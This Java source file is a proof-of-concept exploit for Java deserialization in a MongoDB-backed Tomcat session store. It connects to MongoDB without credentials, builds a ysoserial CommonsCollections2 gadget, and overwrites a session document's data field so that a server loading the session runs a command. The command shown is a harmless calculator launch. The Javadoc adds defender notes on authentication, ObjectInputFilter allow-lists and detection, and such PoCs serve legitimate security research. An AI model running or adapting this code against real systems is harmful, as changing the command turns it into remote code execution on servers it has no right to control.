EvilMongodbClient.java
package com.nosqlclient.tomcat;
import com.mongodb.BasicDBObject;
import com.mongodb.MongoClient;
import com.mongodb.client.ListCollectionsIterable;
import com.mongodb.client.MongoDatabase;
import org.bson.Document;
import org.bson.types.ObjectId;
import ysoserial.payloads.ObjectPayload;
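/**
 * Proof-of-concept client for a deserialization weakness in a MongoDB-backed session store.
 *
 * <p>It replaces the {@code data} field of one document in the {@code tomcat.sessions}
 * collection with the serialized form of a ysoserial gadget object. The reader of that field
 * is not part of this file; presumably a Tomcat session manager loads it with native Java
 * deserialization (confirm against the session manager's code).
 *
 * <p>Review notes for defenders:
 * <ul>
 *   <li>The connection below carries no credentials, so the demonstration depends on a MongoDB
 *       instance that accepts unauthenticated writes. Enabling authentication and restricting
 *       network access to the session database removes that precondition.</li>
 *   <li>Bytes read back from a session store are untrusted input. The consumer should apply an
 *       allow-list {@code ObjectInputFilter} (JEP 290), or use a non-native session format.</li>
 *   <li>The gadget chain needs a vulnerable library on the consumer's classpath. Keeping such
 *       libraries patched or absent limits the impact, but it does not replace input filtering.</li>
 *   <li>Detection: writes to the session collection from clients other than the application
 *       server, and session blobs whose class descriptors are not session classes.</li>
 * </ul>
 */
public class EvilMongodbClient {

    /**
     * Connects to the local MongoDB instance and overwrites one session document's payload.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        // No credentials are supplied: this only works against a MongoDB that allows anonymous writes.
        MongoClient client = new MongoClient("localhost", 27017);
        try {
            MongoDatabase db = client.getDatabase("tomcat_sessions");

            // Gadget object built by ysoserial. The command is the harmless calculator launch
            // used as a visible marker in demonstrations.
            Object payloadObject =
                    ObjectPayload.Utils.makePayloadObject("CommonsCollections2", "open -a Calculator");

            // SerializeUtil is declared elsewhere in the project; presumably it wraps
            // ObjectOutputStream (confirm).
            byte[] serialData = SerializeUtil.serialize(payloadObject);

            // The target is a fixed session id taken from the author's test database.
            db.getCollection("tomcat.sessions").updateOne(
                    new BasicDBObject("_id", new ObjectId("5ec96c9a2a3cd7a39bc36901")),
                    new BasicDBObject("$set", new BasicDBObject("data", serialData)));
        } finally {
            // The original never closed the client, which leaks its connection pool and threads.
            client.close();
        }
    }
}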